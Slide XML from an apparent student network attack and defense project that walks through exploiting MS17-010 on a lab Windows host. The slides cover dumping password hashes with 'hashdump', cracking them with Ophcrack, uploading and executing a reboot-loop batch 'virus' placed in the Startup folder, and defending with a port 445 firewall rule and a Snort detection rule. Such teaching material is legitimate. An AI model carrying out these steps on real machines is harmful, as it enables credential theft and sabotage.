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9" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259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ECA25-1625-47C7-9BD7-8101E3A23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網路攻防期末作業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4824B4-3661-4091-B047-199F9B030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I4A51 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>黃泳育</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>I4B28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>王少雷</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335642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845E9-A7F0-4F9F-A3C1-F26229C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6528"/>
          </a:xfrm>
        </p:spPr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D8740E-06E7-4868-87EE-8268D7AFF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5916608"/>
            <a:ext cx="9355899" cy="770706"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We can use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” to check our authority. We get the “AUTHORITY/SYSTEM”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>It is the largest authority in Windows.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501323-0073-4DA2-972E-9E0325D2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32" y="1629832"/>
            <a:ext cx="6367245" cy="40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2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84739-9DA0-4204-9657-71E255F5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D46FF-42DA-4852-8403-9D98EF16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090407"/>
            <a:ext cx="8596668" cy="672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The flag.txt is in the C:\ProgramData\Templates. We want to get it but we don’t have the authority.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BEFE5C-153E-4DE2-A0BD-F226C74F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16" y="1341080"/>
            <a:ext cx="5566139" cy="4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9DC49-E38F-4503-AA44-22378177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9A740B-372B-4302-A221-F6E8BEF19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2" y="5924779"/>
            <a:ext cx="8596668" cy="647241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>First, Input “shell” to prepare to send the command to the computer you hack.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DAA21D-AB55-4F55-87A2-CF7D0FA4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1" y="1504314"/>
            <a:ext cx="7316614" cy="40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E2DE0-B16D-4170-A30D-CE88FFE6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46222-AB28-402D-ADFD-899E4E1D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63237"/>
            <a:ext cx="8596668" cy="865354"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Second, you can find the flag.txt file. But you can’t read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C2ACBD-A6BF-4554-9DE6-BC996ED6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30" y="1463048"/>
            <a:ext cx="6848475" cy="1666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B95F96-873E-43C6-AED0-0EB36418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42" y="3849339"/>
            <a:ext cx="36766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24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FE2BC-B6B2-466B-BF77-5BA5EA71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9208"/>
            <a:ext cx="8596668" cy="1001086"/>
          </a:xfrm>
        </p:spPr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FC3C1-7700-4AFE-BA64-CFE507AF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11568"/>
            <a:ext cx="8596668" cy="1346432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>But it’s ok. We can input “exit” to exit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> mode. After doing it, we cd to the C:\ProgramData\Templates. And cat flag.txt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We will get the flag “Congratulations!!!”.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559FC0-77DE-4CF2-BEFE-62E646B1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22" y="1832767"/>
            <a:ext cx="6187492" cy="34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5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9C05E-4848-4F96-8F85-C8202D0E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2697"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Advance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E9B7CF-A44D-48E9-90FD-0781257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57306"/>
            <a:ext cx="8596668" cy="4256659"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We also can use it to do other “cool” things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>For example, you can get the hashes of all users in the computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You also can upload a virus to the computer.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8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222DCA-55E1-454E-89DD-D56CFF34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crack passwords?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CF22C4-EBD2-4169-B1D3-DCEDE0A7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1688"/>
            <a:ext cx="8596668" cy="4632013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Follow all steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step1. Input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” to get all hashes of users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step2. Open application “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>”. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> is using rainbow table to crack hashes, so if you don’t have any rainbow table, please download it to your computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step3. Copy the hash and paste to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step4. Press “Crack” button and wait for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step5. You will get the password!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68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3FB92-64CD-4DC2-87E0-34DEAF3B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crack passwords?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1C8D48-5D33-457C-B47A-C369AC8E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696125"/>
            <a:ext cx="8596668" cy="781465"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step1. Input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hashdump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8FC3-F29F-44A0-8789-EEF91AB1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1390650"/>
            <a:ext cx="77724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E976B-97AC-485F-9D1E-94508622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crack passwords?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8C1D84-C088-4E9A-9940-43FAB4519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7" y="5937363"/>
            <a:ext cx="8596668" cy="622074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step2. Open application “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack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C3DCD7-F09F-4324-9169-D9EC49EE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14" y="1324473"/>
            <a:ext cx="5943775" cy="42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AC33F-E8DE-4124-B202-5D80E977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crack passwords?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6BCA89-F4A0-48A2-8505-8D8D304A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048462"/>
            <a:ext cx="8596668" cy="689186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step3. Copy the hash and paste to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> application.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B33BE8-20C9-48F7-A9AE-D738292D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02" y="1930400"/>
            <a:ext cx="6552129" cy="39247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16B160-477C-41F1-8B40-01D7CB277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55" y="1355936"/>
            <a:ext cx="69818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0D840-1113-40B2-B3CA-5BF8B625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MS17-010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1398FE-1A60-4DA7-A296-ABEC0B58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Today We want to introduce MS17-010 vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MS17-010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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vulnerability that it was found in 2017. This is a serious vulnerability. In the CVSS, its score is 9.3 (full score is 10).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Its theory is sending a malicious packet to the Windows SMB Server’s TCP 445 port.  And you will get the system authority.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017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55366-6553-46AF-9AF2-8FC4AEAA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crack passwords?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B94FCF-602F-4131-80B0-1D1D6464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41557"/>
            <a:ext cx="8596668" cy="613685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step4. Press “Crack” and wait for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67871C-80A6-4AED-87B8-4D77F9C0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12" y="1657964"/>
            <a:ext cx="5381712" cy="37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FAFA7-F322-4926-AA8C-296BD9BB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crack password?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3C824A-F23E-4A3C-9AB0-31E4EF1D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66724"/>
            <a:ext cx="8596668" cy="563351"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> cracks, we can check the password “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ShaoLei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718E61-B1F6-43B5-8B07-FB4CD0B3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234" y="2121910"/>
            <a:ext cx="5182867" cy="36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D30BA-3019-4D36-94C3-186767F5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6253"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>How to crack passwords?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F1F963-625B-4011-A152-2E3433E0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03807"/>
            <a:ext cx="8596668" cy="689186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We login it successfully.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6B5557-F787-4130-BDDF-FAC7A9BA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7" y="2010011"/>
            <a:ext cx="4159322" cy="34356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993B18-5204-4C62-AE1A-40E61397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10" y="1300293"/>
            <a:ext cx="5916683" cy="44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64A42-D8AF-4D9E-A4E9-0B729EBC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upload a virus to the computer?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E44B6D-7D06-4A0C-8381-E66935439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69684"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step1. Prepare a virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step2. Input “upload (virus file)” to upload the virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step3. Input “execute –f (virus file)”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349237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1D92C-E76C-4A18-ACA2-9AB0FBED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upload a virus to the computer?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6E2BB-3533-4A30-BA1D-AF48C0E8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612235"/>
            <a:ext cx="8596668" cy="966023"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The virus will be executed on the hacked computer.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3CB57-E8BB-4437-8834-F352B4EC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55" y="2505075"/>
            <a:ext cx="7134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8A2B0-35DE-4FC9-AF1F-C325477E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prevent this vulnerability?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C1E07-FB34-4FA8-8EB8-D18B41C6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96560"/>
            <a:ext cx="8596668" cy="982801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We know the theory of this vulnerability, so we also can prevent it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We can set a firewall rule that the computer denies port 445 to prevent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C79DC-28BC-4F66-BD71-90C35AE7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2" y="1400962"/>
            <a:ext cx="4493511" cy="35914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902B08C-25D1-4C4B-AD69-CBC81555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33" y="1325086"/>
            <a:ext cx="4819965" cy="38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0E932-DEB7-4CEE-BD38-8B959A50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prevent this vulnerability?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516FBF-55F3-44EB-8DA4-01298C59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897461"/>
            <a:ext cx="8596668" cy="571740"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After doing it, the hacker can not hack the computer by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E0F053-02B0-4606-A392-19633FB4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68" y="2659922"/>
            <a:ext cx="78486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9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64E46-1888-46B6-AB47-8666551B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prevent this vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>by Snort?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F6063-451E-4068-A9F5-DDDF3D718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06305"/>
            <a:ext cx="8596668" cy="3835057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According to the previous pages’ content, we know if the hackers want to use this vulnerability to hack our computer, they will send the package to the 445 port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>So we can take advantage of the Snort to protect our computer. We write :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>“alert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -&gt; $HOME_NET 445 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>msg:“Warning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> !! ms17-010 exploit has been detected by Shao-Lei Wang!!!"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>flow:to_server,established</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>; content:"|FF|SMB3|00 00 00 00|"; depth:9; offset:4; byte_extract:2,26,TotalDataCount,relative,little; byte_test:2,&gt;,TotalDataCount,20,relative,little; sid:41978; rev:5;)”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In this Snort command, it can record alerts when someone connects to your TCP 445 port.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10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B325E-92CF-492A-BE12-2E9C59E9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prevent this vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>by Snort?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BCC6A-789B-4BA4-B176-2C072B84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90114"/>
            <a:ext cx="8596668" cy="1611975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We can write a Windows bat file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>execute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6EE2CB-D817-4D97-BB5B-58A3F68A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05" y="2795587"/>
            <a:ext cx="61055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5CDEE-F769-4993-993C-E4BFA398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prevent this vulnerability by Snort?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64D2A-F77B-47D9-A7F5-0316C9E7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217952"/>
            <a:ext cx="8596668" cy="1184136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>We will get these alerts.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4AF0B6-D733-44F5-BEE1-64B0C799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14575"/>
            <a:ext cx="104013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9DC16-CBA6-4DB0-85C9-49FB09AF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MS17-010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BFB7C3-6A99-41F5-9F0D-E7B0331C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02965"/>
            <a:ext cx="9272009" cy="4732680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>In the Windows SMB v1, we send a packet and make a function “SrvOs2FeaListToNt” overflows when it processes file extension attribute(FEA). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After overflowing, hacker can use heap spraying to allocate a memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Then, hacker can use shellcode to control the system.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979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0BA17-AA2D-4F93-8E42-E7CDCE06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C67CF4-0425-4D66-9F4F-C306A74B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20562"/>
            <a:ext cx="8596668" cy="1603586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Do you want to inject the virus into other’s computer? Let’s do it!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>According to the previous pages, we can crack the user’s password, upload virus and it can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to login!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94C631-536B-4CAF-AC9D-951B82F6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1" y="609600"/>
            <a:ext cx="37909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FC616-92A2-4358-9566-85957696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33B90B-87B5-45E0-AFE9-2323D5469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67012"/>
            <a:ext cx="8596668" cy="697575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>First, we use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>” to get Administrator’s password hash.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1DD22F-F392-42D2-8C4F-9C43443E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77" y="1419225"/>
            <a:ext cx="7867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1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E470B-E879-4E55-9038-4B20FAC9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D8E42-8BC7-43AB-8F3F-DED4AC22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821961"/>
            <a:ext cx="8596668" cy="682948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Then, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ophcrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to crack Administrator’s password, According to this photo, the password of the Administrator is “vagrant”.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647D8C-48E2-4FA2-A003-265161054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00" y="1300752"/>
            <a:ext cx="6116536" cy="42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63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8B4A3-B4D7-4796-B918-3090EE3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9E9D1B-B0BC-40BB-B52F-CBBD45D7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452845"/>
            <a:ext cx="8596668" cy="1046526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Then, input “upload (your virus’ name)” into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to upload your virus. And input “execute –f (your virus’ name)” to execute it.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C1448B-6E27-4EC3-9AA7-DD90A7B7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93" y="2708289"/>
            <a:ext cx="60007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B5275-2DA8-4FBA-B49B-FD7F0F7E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A25B9C-A98B-468A-AFB6-85BF55F3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489663"/>
            <a:ext cx="8596668" cy="1113761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You can use Metasploit to upload your virus to the hacked computer but you can’t reboot it. Don’t worry, you can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to login the Administrator.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DC8E94-9394-4A68-8059-8D29D6D5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1" y="3024187"/>
            <a:ext cx="4991100" cy="809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E6B62B0-D31A-4642-8D2C-47762FE4F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14" y="2613913"/>
            <a:ext cx="5131134" cy="19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5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8FEA5-0F0E-4684-BC60-D6931ACE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15341"/>
            <a:ext cx="8596668" cy="949504"/>
          </a:xfrm>
        </p:spPr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E06CC9-EC90-4EC7-A5FD-A39233C5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29681"/>
            <a:ext cx="8596668" cy="812978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>You can use “shutdown –r –t 0” to reboot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6BC79A-4D4C-4C7C-8F3E-66E6011D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26" y="1686198"/>
            <a:ext cx="8400176" cy="3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8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AD31F-2754-4584-BBC8-6941BB87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978"/>
            <a:ext cx="8596668" cy="995536"/>
          </a:xfrm>
        </p:spPr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D8874C-6BED-43C1-AC24-920A2168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821960"/>
            <a:ext cx="8596668" cy="580129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After rebooting, the virus will work.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5B8A78-4770-4F9E-9D29-C5A07108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10" y="1457778"/>
            <a:ext cx="4423116" cy="39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4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06B14-230F-4CF2-B9BB-299212EB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720DF6-806F-4FA8-9360-68E3D1F6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48169"/>
            <a:ext cx="8596668" cy="1971413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The theory of my virus is creating a batch file on the path </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”. All the programs in this folder will execute after login by Windows GUI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The batch file is written “shutdown –r –t 1”. It means your computer will shut down in 1 second after executing.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EA0037-FC63-4081-93F6-53B1F2D4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18" y="1537545"/>
            <a:ext cx="81153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7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BD4B2-6C15-42AF-8FF2-EDEC13ED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Easter Egg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3D7957-2853-4126-9A1D-5A9517A26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88404"/>
            <a:ext cx="8596668" cy="655630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This is the source code of the virus.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CC4C03-C8BE-464A-9DED-02A8C988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38250"/>
            <a:ext cx="87725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64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89540-AB21-4D41-ADC3-17F43931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13" y="3162883"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Thank you for watching!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0677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CE4C7-4638-4FE7-B286-4FB0F1B6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MS17-010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9DBD46-1EBF-4FBE-904A-B78762CD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35383"/>
            <a:ext cx="8596668" cy="789854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A famous virus “WannaCry” is also using this to spread its virus to other computers.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="WannaCry - 維基百科，自由的百科全書">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD41B44E-D67D-4FC6-859C-E94037B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49" y="1514319"/>
            <a:ext cx="5554037" cy="38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0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B3092-69A5-4036-9613-15985E74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MS17-010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EC4373-82F1-4CEC-8259-C3F90D3A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71626"/>
            <a:ext cx="8596668" cy="964734"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>This is the first malicious packet of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B9250B-811B-4F58-83FA-7AC1194B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71" y="1401171"/>
            <a:ext cx="5433794" cy="40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EE8A79-5373-4B87-AA4C-ED899F6E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D0DB98-39EC-408B-AECE-34175BE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42532"/>
            <a:ext cx="8596668" cy="3675667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step1. Open the terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Step2. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
